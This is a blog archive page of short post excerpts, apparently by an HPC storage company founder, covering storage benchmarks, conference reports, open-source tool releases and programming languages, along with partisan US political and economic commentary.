Oh yes we did. Oh yes. We did. This is the fastest storage box we are aware of, in market. This is so far outside of ram, and outside of OS and RAID level cache …
[root@siFlash ~]# fio srt.fio ... Run status group 0 (all jobs): READ: io=786432MB, aggrb=23971MB/s, minb=23971MB/s, maxb=23971MB/s, mint=32808msec, maxt=32808msec This is 1TB read in 40 seconds or so. 1PB read in 40k seconds (1/2 a day).
Posts
Playing with AVX
I finally took some time from a busy schedule to play with AVX. I took my trusty old rzf code (Riemann Zeta function) and rewrote the time expensive inner loop in AVX primatives hooked to my C code. As a reminder, this code is a very simple sum reduction, and can be trivially parallelized (sum reduction). Vectorization isn’t as straightforward, and I found that compiler auto-vectorization doesn’t work well for it.
Posts
Amusing
The IBM folks have turned the Blue Gene into what they claim is the worlds fastest blast engine. Interesting read. They use our A. thaliana data in the Bioinformatics Benchmark System v3 (BBS) to perform their measurement, as well as data from Aaron Darling for mpiBLAST. Our data had been in a mislabeled file for years, and I never took the time to rename the S. lycopersicum for the original Arabidopsis.
Category: personal
Posts
Typecasting and the "trust us" factor
Finding myself on the other side of the table in the consumer-vendor relationship has resulted in some eye opening experiences. These are things I look back on, and realize that I strenuously avoided doing during my Scalable days. But I see everyone doing it now, as they try to sell me stuff, or convince me to use things. One of the eye opening things is a bit of typecasting of sorts.
Posts
Some updates coming soon
I should have something interesting to talk about over the next two weeks, though a summary of this is Scalable Informatics is undergoing a transformation. The exact form of this transformation is still being determined. In any case, I am no longer at Scalable. Some items of note in recent weeks.
M&A;: Nimble was purchased by HPE. Not sure of the specifics of “why”, other than HPE didn’t have much in this space.
Posts
Ten years ago this blog was born
This was my first post. On 12-October-2005. I’ve written about many things over the past decade. 2000 plus posts, 200 per year, averages about 4 every 7 days or so. I’ve slowed down a bit in recent months, as work has grown more intense, but there are many thoughts I want to get down. To a large extent, my journey through HPC has been an interesting one, and only slightly captured in these posts.
Posts
Three years
Its been 3 years to the day since I wrote this. As we’ve been doing before this happened, and after this happened, we are going to a TSO concert on the anniversary of the surgery. Its an affirmation of sorts. I can tell you that 3 years in, it has changed me in some fairly profound ways … I no longer take some things for granted. I try to spend more time with the family, do more things with them.
Posts
Brings a smile to my face
My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. “Its code combat Dad.” she said, quite matter of factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
Definition of vacation
… appears to be normal working hours from a location that is not your office, home … I am supposed to be on vacation. A short one, as there are simply far too many things on my plate (notice my recent posting frequency?). Instead, I am trying to solve problems for customers, sign NDAs, handle support calls. What was the purpose of vacation or holiday again? I keep forgetting.
Posts
I have finally given in to the borg collective
I am now on Facebook. Turns out my family and all my friends are there, so … … how soon before we have to change for the next great social network platform? I’ve got more than one Twitter account (@sijoe and @scalableinfo), a linkedin account, a google+ account (that for the life of me I can’t really figure out), and now facebook. Not to mention 2 blogs (here and at work).
Posts
Another bucket list item
On my vacation in NY recently, I happened to be able to tick off another item on my bucket list. There’s some background to it, but here’s the pics.
[ ](/images/IMG_1454.JPG)
[ ](/images/IMG_1456.JPG)
and
[ ](/images/IMG_1459.JPG)
The background to this is a short story I’ve been working on for a while. A near future serum run in effect. Should be done very soon, though I’ve been working on it in very short bursts.
Posts
OT: Canton MI Olympian and an Olympian hopeful
Took off work early to take family (and Captain!) to see Allison Schmitt at Canton’s Heritage Park. For those who don’t know, Allison won 3 gold medals, a silver, and a bronze at the 2012 Olympics in London. We watched 2 of her races, most of Ryan Lochte’s, Michael Phelps, and as many of the swimming contests as NBC broadcast (sadly not enough). My wife and I enjoyed the races, and, as it turns out, so did my daughter.
Category: politics
Posts
Voting in HPCWire's readers choice awards are open, please vote!
Our friends at Lucera are in number 6 for best use of HPC in a financial services category. Our Unison product is at number 11 for Best HPC Storage Product or Technology. And I did a write in for #21 for us :D. Our friends at Mellanox have their 100Gb EDR Infiniband technology at number 14. Please do vote (early, not often).
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
Why not go Galt?
For those who don’t get the reference, “going Galt” points back to the masterpiece novel “Atlas Shrugged” by Ayn Rand. In it, one of the characters is named John Galt, and part of what he does, early in the novel, is convince those whom create jobs, and wealth in the country, to abandon their efforts, as the government lurches harder and farther to the redistributionist world view. Indeed, the country eventually goes full on socialist in the story, where people are not allowed to quit work, take a better job, and so forth.
Posts
Oh dear lord
Lets see if this actually materializes. Its pretty obvious as to how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straighforward definition in the US Constitution.
Posts
You get what you vote for
This is sad.
Here’s the really sad parts of this
Not only did they close the parks, but they turned off the web sites The park employees are being ordered to make life as hard as possible for the patrons. None of this had to happen. Had the democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.
Posts
Dead on correct article
What many of us worried about years ago was whether or not we weer electing an empty suit to the highest political office in the land. Someone with no experience running anything. With no great accomplishments upon which to build. Simply a moderate orator with a teleprompter. 5 years in, our worst fears don’t even appear to scratch the surface of the failure that we have brought upon ourselves. This piece at the Wall Street Journal is so completely spot on.
Posts
Part of the reason why Detroit has a long rough road ahead
is due, in significant part, to bad law and bad policy enshrined in law. Ideological view points are hard coded in the firmware of Michigan. Which allows lawsuits and results such as this. It cannot be overemphasized how bone-headed this particular law is. That one can never, under any circumstances, reduce pensioner benefit values. This means, if you ever struck a bad deal, like Detroit, and many others in Michigan have, you have no choice but to continue this bad deal for eternity.
Posts
... and bang goes Detroit ...
This brings me no joy. I went to grad school in Detroit. I like this city. It has character, it has guts, it has potential. It also has no cash to continue operations. And that sucks. Detroit filed for chapter 9 bankruptcy a few hours ago. There are many reasons for this, but there are a number of specific ones, that are generalizable to businesses as well. First, population decline has led to a tax revenue decline.
Posts
You can't make this stuff up, 10-June-2013 edition
Link here. Don’t want to tax ALL businesses … out of business? Just some of them? Are you mad? Are you freaking kidding me? Pulling my leg? Very sad. Very very sad. The government should be seeking to reduce taxes to make sure businesses grow, and hire, and spend. Mr. President, the entire role of government in business should be to get out of the way, lest you slow down growth, employment, and spending.
Posts
That's what now ... 5 live scandals?
[Update] That didn’t take long. Looks like the government is angry about all of this. The leak of the leaks that is. And they are going to try to find the culprit, and prosecute them. Any “Mea Culpas” from them on the fact that this is … I dunno … illegal? Er … no. Most transparent admin … evuh??? I read something last week which made me laugh. It read “tomorrow is Thursday, time for a new scandal”.
Posts
When you've lost Jon Stewart ...
Here in the US, we have a number of scandals brewing. Many of those for the party in control of the White House and the Senate would like to have you believe that these are in fact tempests in teapots. In this case, there are at least 2 Nixonian scandals going non-linear here, with a 3rd trying to break through. The political left is doing all it can to wave off one of them, though this is getting progressively harder by the day as more information comes out.
Posts
Do we really have enough native STEM workers in the US?
Yes, actually we do. Too many. Turns out that little law of supply and demand does in fact hold true. The higher the demand for something in limited supply, the higher the price (wages) you will pay for it. By applying forces to this law, you impact a number of outcomes. That is, if you start monkeying around with the supply, sure, you can adjust the price you pay for the STEM.
Posts
This will not end well
Watching the slow motion train wreck in Cyprus made me wonder exactly whom the target of the money grab was. And more importatly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.
Posts
The sequester is here
Suffice it to say that much hot air was blown over the sequester in the media. Really, there was much tearing of clothes over this. Much righteous indignation that someone in government, somewhere, would have to make (not so very hard) decisions about where to trim budgets. We needed this, as the US government is so completely broken as to no be able to propose a reasonable budget, pass a reasonable budget, nor listen to and work with ideas from other portions of the legislative branch which want to work on reasonable budgets.
Posts
Nails it !!!
Dave Barry in his usual fine form … summarizes our year. The one take away should be … WHAP
Posts
1 January 2013 : its over the cliff we go!
[update] This pretty much says it all. [update 2] … and … they … fold. A bad deal, about to be voted into law. As they said, elections have consequences. Whatever happens, they (WH and Senate) now own it. No cuts, just taxes. Even though our problem is way too much spending and mis-targeted tax increases.
Less than 10 hours into the new year for us here in GMT-5. There is some aspect of humanity whereby many view this as a hopeful time, a chance to “begin anew”.
Posts
On the dangers of economic prognostication, and presidential elections
is drinking your own koolaid, consuming your own product, believing the wishful thinking that underlies your most serious predictions. Like this. Just like in catastrophic AGW, there’s one single chart that belies all the claims as to how “well” the “stimulus” package did. Its a damning chart. Here it is.
[ ](http://www.aei-ideas.org/2012/11/is-this-as-good-as-it-gets-novembers-dismal-new-normal-jobs-report/)
And worse, if you look at how the recovery compares to others … its not going very well at all.
Posts
When you've lost Dilbert ...
… the game may be over. Ok, this is a very well written, and extremely cogent argument. Scott Adams, creator of Dilbert, indicated why he’s not supporting Obama, and is endorsing Romney in the US Presidential election. His reasons boil down to a firing offense Mr. Obama committed (in Adams' opinion). More specifically, he indicates that he doesn’t like lots of Romney’s positions, but Romney hasn’t committed this particular offense. And specifically to the point of competence, Adams gets that Romney is a turn-around guy.
Posts
Interesting and depressing article on Michigan's future
A few prefaces … First, I disagree with the premise throughout this article that our governor is timid. He is, IMO, and in many people’s opinion, doing a great job. Governor Romney is very similar to Governor Snyder in many ways. Timidity really isn’t apparent. I guess that people see someone making a cost-benefit analysis for engaging in a particular debate, or pushing for a particular outcome, and deciding to forgo a particular fight, as being timid.
Posts
hits bottom, digs deeper
[update] below the fold and video. I can only conclude at this point that the “don’t get it” disease runs deep and wide in this administration. [update 2] This at the WSJ encapsulates what we are observing. This has gone beyond painful to watch to embarrassing. The president now claims that his statements were sliced and diced. He now is saying that he believes that businesses built themselves, while claiming that his earlier statement was taken out of context.
Posts
why do people double down when they are wrong?
And do it again,
… sooooo …. a public works project (bridge, dam, …) is equivalent in his eyes to …. a risk an entrepreneur takes? Seriously?
Erp …. its glaringly obvious whom does not have an understanding. The worker in the private sector, punches the clock BECAUSE somewhere, somewhen, the entrepreneur had the idea, took the risk, entirely upon themselves, and built something. The “public sector” is a cost, something to be kept as small as possible so as not to drive those paying the public sectors bills, into the poor house.
Posts
How I'd like politicians to view entrepreneurs
Wonderful post by Jim Pethokoukis, covering a talk made by Ronald Reagan years ago.
and
I will freely admit that I was (almost) completely wrong in my original impressions of Reagan. I had a different political outlook in those days, and I had trouble viewing the guy as getting it. But get it, he did. This change in perception comes mostly from a maturing and a rethinking of my own world view.
Posts
... and now the cartoons ...
below the fold. Snarfed from many places on the net. Copyrights are owned by their respective owners. I don’t know all the correct attributions, so if you find/know of it, please let me know so I can correctly update the list.
The few remaining defenders of this failed statement and meme are all parroting seemingly, the exact same talking points. Now why would that be? Most everyone else, regardless of political affiliation realizes what a complete mess this has become … well … those outside of the media.
Posts
OT: I want to comment on this ...
[update] Good for them, the NFIB hits back, hard. No mental gymanstics required to correctly interpret what was said. Further they back it up with almost identical quotes from Elisabeth Warren herself, who appears to be the originator of this epic failure of a meme. This entire meme deserves all the derision being heaped on it. [update 2] And the pile on begins in earnest. James Pethokoukis (economics blogger and many other things) has some good comments of his own, as well as from others.
Category: recent-history
Posts
Another article about the supply crisis hitting #SSD, #flash, #NVMe, #HPC #storage in general
I’ve been trying to help Scalable Informatics customers understand these market realities for a while. Unfortunately, to my discredit, I’ve not been very successful at doing so … and many groups seem to assume supply is plentiful and cheap across all storage modalities. Not true. And not likely true for at least the rest of the year, if not longer. This article goes into some depth that I’ve tried to explain to others in phone conversations, private email threads.
Posts
An article on Detroit that is worth the read
Detroit had filed for bankruptcy protection a while ago. The rationale for this was simple, they simply did not have the cash flow to pay for all their liabilities. They had limited access to debt markets for a number of reasons, and they couldn’t keep cranking up the taxes on residents and businesses in the city to generate revenue. They were between a rock and a hard place. I have a soft spot in my heart for Detroit.
Posts
We had a record setting, knock the barn doors down year last year
… and believe it or not, I forgot to mention it. This is the first time in company history that we had a backlog going into Q1. Orders being built and tested on the last work day of the year. We grew, not the amount we had originally forecast, but we understand why (and sadly have little control over that aspect). We are working very hard on our appliances … I am blown away as to how perfect a fit they are for folks.
Posts
Oh dear lord
Lets see if this actually materializes. Its pretty obvious as to how hard the media folks tried to spin this with the title. A good rubric for how the US media treats the president and his opposition could be found in this cartoon. With that in mind, read the title of that article, and then note this little tidbit on the inside:
Notice the scare quotes around the word treason. Treason has a very straighforward definition in the US Constitution.
Posts
You get what you vote for
This is sad.
Here’s the really sad parts of this
Not only did they close the parks, but they turned off the web sites The park employees are being ordered to make life as hard as possible for the patrons. None of this had to happen. Had the democrats decided that, ya know, in a political environment where negotiation is the key to advancing agendas, and not a burnt ground strategy, chances are they would be able to get some of what they wanted.
Posts
Another bucket list item
On my vacation in NY recently, I happened to be able to tick off another item on my bucket list. There’s some background to it, but here’s the pics.
[ ](/images/IMG_1454.JPG)
[ ](/images/IMG_1456.JPG)
and
[ ](/images/IMG_1459.JPG)
The background to this is a short story I’ve been working on for a while. A near future serum run in effect. Should be done very soon, though I’ve been working on it in very short bursts.
Posts
That's what now ... 5 live scandals?
[Update] That didn’t take long. Looks like the government is angry about all of this. The leak of the leaks that is. And they are going to try to find the culprit, and prosecute them. Any “Mea Culpas” from them on the fact that this is … I dunno … illegal? Er … no. Most transparent admin … evuh??? I read something last week which made me laugh. It read “tomorrow is Thursday, time for a new scandal”.
Posts
When you've lost Jon Stewart ...
Here in the US, we have a number of scandals brewing. Many of those for the party in control of the White House and the Senate would like to have you believe that these are in fact tempests in teapots. In this case, there are at least 2 Nixonian scandals going non-linear here, with a 3rd trying to break through. The political left is doing all it can to wave off one of them, though this is getting progressively harder by the day as more information comes out.
Posts
This will not end well
Watching the slow motion train wreck in Cyprus made me wonder exactly whom the target of the money grab was. And more importatly, whether or not the people making demands had any clue that their victory was, at best, Pyrrhic, and at worst, a serious contagion. Any financial system in operation is built upon various levels of trust, implicitly in the case of the least risky capital storage system. You know that you can trust, within reasonable expectations and parameters, that capital that you deposit there can be retrieved later.
Posts
The sequester is here
Suffice it to say that much hot air was blown over the sequester in the media. Really, there was much tearing of clothes over this. Much righteous indignation that someone in government, somewhere, would have to make (not so very hard) decisions about where to trim budgets. We needed this, as the US government is so completely broken as to no be able to propose a reasonable budget, pass a reasonable budget, nor listen to and work with ideas from other portions of the legislative branch which want to work on reasonable budgets.
Posts
Nails it !!!
Dave Barry in his usual fine form … summarizes our year. The one take away should be … WHAP
Category: risk
Posts
Excellent article on mistakes made for infrastructure ... cloud jail is about right
Article is here at Firstround capital. This goes to a point I’ve made many many times to customers going the cloud route exclusively rather than the internal infrastructure route or hybrid route. Basically it is that the economics simply don’t work. We’ve used a set of models based upon observed customer use cases, and demonstrated this to many folks (customers, VCs, etc.) Many are unimpressed until they actually live the life themselves, have the bills to pay, and then really … really grok what is going on.
Posts
M&A fallout: Cisco may have ditched Invicta after buying Whiptail
Article is here, take it as a rumor until we hear from them. My comments: First, M&A; is hard. You need a good fit product wise (little overlap and great complementary functions/capabilities), and a culture/people fit matter. Second, sales teams need to be on-board selling complete solutions involving the acquired tech. Sometimes this doesn’t happen, for any number of reasons, some fixable, some not. Third, Cisco is out of the storage game if this is true.
Category: science
Posts
Opening keynote @Supercomputing #SC18 : #HPC is an enabling technology ...
… Ok, the speaker said far more than that. But one of his central theses is that in this “second” machine revolution, we are enabling data driven decision making, distributed decision and consensus, as well as expanding beyond the confines of specific expertise in a field. The latter I’ve heard described as cross fertilization … gather a bunch of smart people “together” and give them a problem spec. Let them run with it.
Posts
I always thought a Ph.D. defense should have a dance component
As seen here. I like the enTANGOeled photons. Not sure how I’d do mine, but its at least amusing to think through.
Posts
When the revolution hits in force ...
Our machines will be there, helping power the genomics pipelines to tremendous performance. Performance is an enabling feature. Without it you cannot even begin to hope to perform massive scale analytics. With it, you can dream impossible dreams. This article came out talking about a massive performance analytics pipeline at Nationwide Children’s Hospital in Ohio. This pipeline runs on a cluster attached to Scalable Informatics FastPath Unison storage. This is a very dense, very fast system, interconnected with Mellanox FDR Infiniband, Chelsio 40GbE, and leveraging BeeGFS from thinkparq.
Posts
Brings a smile to my face
My soon to be 15 year old daughter was engrossed with something on her laptop yesterday. Thinking it was fan-fiction, I asked her what she was writing. She knitted her brow for a moment, and looked up. “Its code combat Dad.” she said, quite matter of factly. I must have had a slightly startled expression on my face. I knew she had dabbled with it, and had recommended (/sigh) Python as a language, after she took (and aced) a Java class last year, as Python is inherently simpler.
Posts
Fantastic lecture from Michael Crichton
This is Michael Crichton of Andromeda Strain, Jurassic park, and other stories. Fantastic story teller, he absolutely nails his subject. The original was on his website, and I grabbed a copy from here. One of the wonderful quotable paragraphs within is this:
A real scientist is, by its own very definition, a skeptic.
Category: scxx
Posts
Video interview: face melting performance in #hpc #nvme #storage @scalableinfo
Oh no … we didn’t say “face melting” … did we? Oh. Yes. We. Did. The interview is here at the always wonderful InsideHPC.com You can see the video itself here on YouTube, but read Rich’s transcript. I was losing my voice, and he captured all of the interview in text. Take home messages: Insane IO/Networking/processing performance, small footprint, tiny price, available for orders now.
Posts
Shiny #HPC #storage things at #SC15
Assuming everything goes as planned (HA!) we should have a number of very cool things at SC15.
* 100Gb [Unison storage system with BeeGFS](https://scalableinformatics.com/unison) * 100Gb [Unison Ceph](https://scalableinformatics.com/unison) system * 100Gb connection to a partner/customer booth * Forte 100Gb is awesome. The first time I ran an iperf bidirectional test, saw 20GB/s … it blew me away. 40/56GbE is old hat now, and 10GbE is in the rapidly receding past.
Posts
Cat peeking out of bag: Schedule of presentations and talks in our booth for SC15 is up
I mentioned previously that we have some new (shiny) things … and it looks like you’ll be able to hear about them at my talk. See the schedule for timing information. This said, please note that we have a terrific line up of people giving talks:
Fintan Quill from Kx on kdb+ … which is an awesome market leading Big Data Time Series analytics and database tool that runs absolutely balls-out insanely fast on our architecture Christian Mohrbacher from Thinkparq on BeeGFS … the primary parallel file system we are leveraging for Unison parallel file system appliances * Mark Nelson from Inktank/Red Hat on Ceph … the reliable block and object storage system that we’ve built into our Unison Object/Block Storage appliance * Doug Eadline from Basement Supercomputing on Hadoop, and likely showing a Limulus deskside Hadoop appliance * Phil Mucci from Minimal Metrics on optimization problems for systems and code.
Posts
#SC14 day 2: @LuceraHQ tops @scalableinfo hardware ... with Scalable Info hardware ...
Report XTR141111 was just released by STAC Research for the M3 benchmarks. We are absolutely thrilled, as some of our records were bested by newer versions of our hardware with newer software stack. Congratulations to Lucera, STAC Research for getting the results out, and the good folks at McObject for building the underlying database technology. This result continues and extends Scalable Informatics domination of the STAC M3 results. I’ll check to be sure, but I believe we are now the hardware side of most of the published records.
Posts
Starting to come around to the idea that swap in any form, is evil
Here’s the basic theory behind swap space. Memory is expensive, disk is cheap. Only use the faster memory for active things, and aggressively swap out the less used things. This provides a virtual address space larger than physical/logical memory. Great, right? No. Heres why.
swap makes the assumption that you can always write/read to persistent memory (disk/swap). It never assumes persistent memory could have a failure. Hence, if some amount of paged data on disk suddenly disappeared, well … Put another way, it increases your failure likelihood, by involving components with higher probability of failure into a pathway which assumes no failure.
Posts
SC14 T minus 6 and counting
Scalable’s booth is #3053. We’ll have some good stuff, demos, talks, and people there. And coffee. Gotta have the coffee. More soon, come by and visit us!
Posts
#SC11 T minus 3 days and counting
Ok. Lets call this an absolutely wild ride so far. I mean, its freaking insane. I cannot remember working so hard and so fast. First off Tiburon, our cluster software package (designed mostly for HPC Storage, and cluster like things) has been an insanely awesome trouper. It just works. And I mean that in a jaw dropping manner. It just freaking works. Part of it may be due to the simplicity of the thing.
Posts
SC'05 wrap up
This took me a while to post in part due to heavy year end load, but also, that I wanted to think through what I did see, and what I didn’t. It is important in many processes to take a moment, step back from where you are, and try to assemble the bigger picture of the situation. This introspection can yield invaluable insights. Failing to do it can blind you to what was there, with you focusing mostly on the minutae.
Posts
Till we meet again ... in Tampa! (not Orlando... Do'h!)
Well, this is the day we had to leave. We saw many things, met many people, had many good conversations. Oddly enough we did not have time to attend talks. I sat in on one BOF. Here is what I observed. IBM is pushing Blue Gene everywhere. In the sessions I did see or hear about from others, it appears that IBM operatives/employees were trying to make a case, even when told that infinite speed wasn’t the issue.
Posts
SC'05 sessions
We had wanted to see several of the sessions including the ClawHmmer, and various others. I spent most of my time talking with various vendors and others on the show floor. ClawHmmer is interesting as it is a GPU version of HMMer, and on good GPU hardware, you can get quite a performance boost on HMMer. The only problem we see is that most servers don’t have good hardware accelerated GPUs.
Posts
SC'05 full day 1 (Tuesday)
This morning, SC'05 featured a keynote address from Bill Gates, CTO and founder of Microsoft. Prior to the keynote, we watched a video loop, and we heard from the heads of the ACM, and the president-elect of the IEEE, as well as the chairperson of the board for SC'06 in Tampa Florida. The president-elect gave a good and short talk on a number of things, including the need to get more women and minorities into the profession.
Posts
SC'05 begins ...
At 7pm PST the network was officially lit with the_ traditional cutting of the optical fibre_, then a ribbon was cut with a large pair wooden handled scissors. Long lines were formed, and much food was consumed. The best thing I saw at the show today is the LightSpace Technology display. The molecular display demo is great, as was the visual human work. The way it works is a very bright digital light pipe technology coupled with diffusive planes for drawing images.
Posts
SC'05 T -1 and counting
The Sun HPCC group had some nice talks from folks doing real science. Specifically I did get to see a talk on path-integral formalism of molecular dynamics, another on using support vector machines for feature identification in patients with Glaucoma. Also saw quite a bit of stuff we cannot talk about, but it was quite interesting. All in all, a fun time was had by all, but we cannot post pictures as most of the bits were under non-disclosure.
Posts
Planes, and automobiles (no trains)
Got here… finally. Seattle is largely sold out of hotel rooms, so I had to get rooms near the airport. Only a short drive to the conference. Could be worse. Weather is cool (a.k.a freezing for those from warmer climates) and wet. The car rental person started telling me all about how many times his car was smashed into, right after I declined the extra coverage… Hmmm…. Maybe that old axiom is in place, the selling starts when the customer says “no”.
Posts
Questions to answer at SC05
So there should be lots of folks at SC05 to answer questions about technology, products, performance, TCO, and most anything else connected with supercomputing you could want to ask. Some questions I want to ask are from the good folks at Microsoft (Bill Gates is giving the opening keynote), what specifically their HPC initiative is supposed to give us that we don’t already have? This is not an OS war, or OSS zealotry, just a simple question as to what their offering will bring to the table.
Posts
Anticipation
Much has changed in a year. Last year, a number of companies such as Orion were on the rise and the darlings of the event. Companies such as my former employer SGI had a strong presence, reasonable revenues, and there were thoughts of a possible turn around. Startups that garnered far less attention than they deserved, such as Ammasso were there in a limited fashion. Other startups (mercifully unamed) that had something of a flash-in-the-pan quality to them seemed abundant.
Category: software
Posts
Well ... that was fun
So … I’ve had this blog since 2005. I installed it from original sources. And WP made upgrades in the 2.x time frame, quite painless.
Or so it seemed.
Slowly, over time, some configuration/settings/whatever got out of whack. And with the last update, from a system originally installed in final form in 2013 or so, something broke.
I am not sure what. But the symptoms were simple … new posts would replace the most recent posts.
Posts
On technology zealotry
I’ve encountered this in my career, at many places. Sadly, early in my career, I participated in some of this. You are a zealot for a particular form of tech if you can see it do no wrong, and decry reports of issues or problems as “attacks”. You are a zealot against a particular form of tech if you cannot see it as a potentially useful and valuable portion of a solution stack, and (often gleefully) amplify reports of issues or problems.
Posts
Interesting post on mixed integer programming for diets ... that has some hilarious output
I am a fan of the Julia language. Tremendously powerful analytical environment, compiled, high performance, easy to understand and use, strongly typed, … there’s a long list of reasons why I like it. If you are doing analytics, modeling, computation in other languages, it is definitely worth a look. Think of it as python, compiled, with multiple dispatch and strong typing … and no indent-as-structure problem. My Julia fanboi-ism aside, there was an interesting blog post about using JuMP, a linear programming environment for Julia.
Posts
Put my Riemann Zeta Function sum reduction code on github
Repo is here: https://github.com/joelandman/rzf. There’s a lightning talk to go along with it, and I’ll make sure I can get it together for this as well.
Posts
Disk, SSD, NVMe preparation tools cleaned up and on GitHub
These are a collection of (MIT licensed) tools I’ve been working on for years to automate some of the major functionality one needs when setting up/using new machines with lots of disks/SSD/NVMe. The repo is here: https://github.com/joelandman/disk_test_setup . I will be adding some sas secure erase and formatting tools into this. These tools wrap other lower level tools, and handle the process of automating common tasks you worry about when you are setting up and testing a machine with many drives.
Posts
Aria2c for the win!
I’ve not heard of aria2c before today. Sort of a super wget as far as I could tell. Does parallel transfers to reduce data motion time, if possible. So I pulled it down, built it. I have some large data sets to move. And a nice storage area for them. Ok. Fire it up to pull down a 2GB file. Much faster than wget on the same system over the same network.
Posts
Oracle finally kills off Solaris and SPARC
This was making the rounds last week. Oracle seems to have a leak in its process, creating labels that trigger event notifications for people, for their packages. Solaris was decimated. More details at the links and at The Layoff. Honestly I had expected them to reach this point. I am guessing that they were contractually obligated for at least 7 years to provide Solaris/SPARC support to US government purchasers. SGI went through a similar thing with IRIX.
Posts
Finally got to use MCE::* in a project
There are a set of modules in the Perl universe that I’ve been looking for an excuse to use for a while. They are the MCE set of modules, which purportedly enable easy concurrency and parallelism, exploiting many core CPUs, and a number of techniques. Sure enough, I had a task to handle recently that required this. I looked at many alternatives, and played with a few, including Parallel::Queue. I thought of writing my own with IPC::Run as I was already using it in the project, but I didn’t want to lose focus on the mission, and re-invent a wheel that already existed elsewhere.
Posts
What reduces risk ... a great engineering and support team, or a brand name ?
I’ve written about approved vendors and “one throat to choke” concept in the past. The short take from my vantage point as a small, not well known, but highly differentiated builder of high performance storage and computing systems … was that this brand specific focus was going to remove real differentiated solutions from market, while simultaneously lowering the quality and support of products in market. The concept of brand and marketing of a brand is about erecting barriers to market entry against the smaller folk whom might have something of interest, and the larger folk who might come in with a different ecosystem.
Posts
On hackerrank and Julia
My new day job has me developing considerably less code than my previous endeavor, so I like to work on problems to keep these particular muscles in steady use. Happily, I get to do more analytics than ever before, so this at least is some compensation for the lower amount of coding. When I work on coding for myself, I’ll play with problems from my research days, or small throw-away ones, like on Hackerrank.
Posts
pcilist: because sometimes you really, really need to know how your PCIe devices are configured
If you don’t know what I am talking about here, that’s fine. I’ll assume you don’t do hardware, or you call someone else when there is a hardware problem. If you think “well gee, don’t we have lspci? so why do we need this?” then you probably have not really tried to use lspci to find this information, or didn’t know it was available. Ok … what I am talking about.
Posts
What is old, is new again
Way back in the pre-history of the internet (really DARPA-net/BITNET days), while dinosaur programming languages frolicked freely on servers with “modern” programming systems and data sets, there was a push to go from a static linking programs to a more modular dynamic linking. The thought processes were that it would save precious memory, not having many copies of libc statically linked in to binaries. It would reduce file sizes, as most of your code would be in libraries.
Posts
That was fun: mysql update nuked remote access
Update your packages, they said. It will be more secure, they said. I guess it was. No network access to the databases. Even after turning the database server instance to listen again on the right port, I had to go in and redo the passwords and privileges. So yeah, this broke my MySQL instance for a few hours. Took longer to debug as it was late at night and I was sleepy, so I put it off until morning with caffeine.
Posts
An article on Rust language for astrophysical simulation
It is a short read, and you can find it on arxiv. They tackled an integration problem, basically using the code to perform a relatively simple trajectory calculation for a particular N-body problem. A few things lept out at me during my read. First, the example was fairly simplistic … a leapfrog integrator, and while it is a symplectic integrator, this particular algorithm not quite high enough order to capture all the features of the N-body interaction they were working on.
Posts
Brings a smile to my face ... #BioIT #HPC accelerator
Way way back in the early aughts (2000’s), we had built a set of designs for an accelerator system to speed up things like BLAST, HMMer, and other codes. We were told that no one would buy such things, as the software layer was good enough and people didn’t want black boxes. This was part of an overall accelerator strategy that we had put together at the time, and were seeking to raise capital to build.
Posts
when you eliminate the impossible, what is left, no matter how improbable, is likely the answer
This is a fun one. A customer has quite a collection of all-flash Unison units. A while ago, they asked us to turn on LLDP support for the units. It has some value for a number of scenarios. Later, they asked us to turn it off. So we removed the daemon. Unison ceased generating/consuming LLDP packets. Or so we thought. Fast forward to last week. We are being told that LLDP PDUs are being generated by the kit.
Posts
A new #HPC project on github, nlytiq-base
Another itch I’ve been wanting to scratch for a very long time. I had internal versions of a small version of this for a while, but I wasn’t happy with them. The makefiles were brittle. The builds, while automated, would fail, quite often, for obscure reasons. And I want a platform to build upon, to enable others to build upon. Not OpenHPC which is more about the infrastructure one needs for building/running high performance computing systems.
Posts
#Perl on the rise for #DevOps
Note: I do quite a bit of development in Perl, and have my own biases, so please do take this into consideration. It is one of many languages I use, but it is by and large, my current go-to language. I’ll discuss below. According to TIOBE (yeah, I know), Perl usage is on the rise. The linked article posits that this is for DevOps reasons. The author of the article works at a company that makes money from Perl and Python … they build (actually very good) tools.
Posts
Another itch scratched
So there you are, with many software RAIDs. You’ve been building and rebuilding them. And somewhere along the line, you lost track of which devices were which. So somehow you didn’t clean up the last build right, and you thought you had a hot spare … until you looked at /proc/mdstat … and said … Oh … So. I wanted to do the detailed accounting, in a simple way. I want the tool to tell me if I am missing a physical drive (e.
Posts
ClusterHQ dies
ClusterHQ is now dead. They were an early container play, building a number of tools around Docker/etc. for the space. Containers are a step between bare metal and VMs. FLocker (ClusterHQ’s product) is open source, and they were looking to monetize it in a different way (not on acquisition, but on support). In this space though, Kubernetes reigns supreme. So competing products/projects need to adapt or outcompete. And its very hard to outcompete something like k8s.
Posts
So it seems Java is not free
This article on The Register indicates that Oracle is now working actively to monetize java use. Given the spate of java hacks over the years, and the decidedly non-free nature of the language, I suspect we are going to see replacement development language use skyrocket, as people develop in anything-but-Java going forward. Think about the risks … you have a massive platform that people have been using with a fairly large number of compromises (client side certainly) … and now you need to start paying for the privilege of using the platform.
Posts
strace -p is your friend
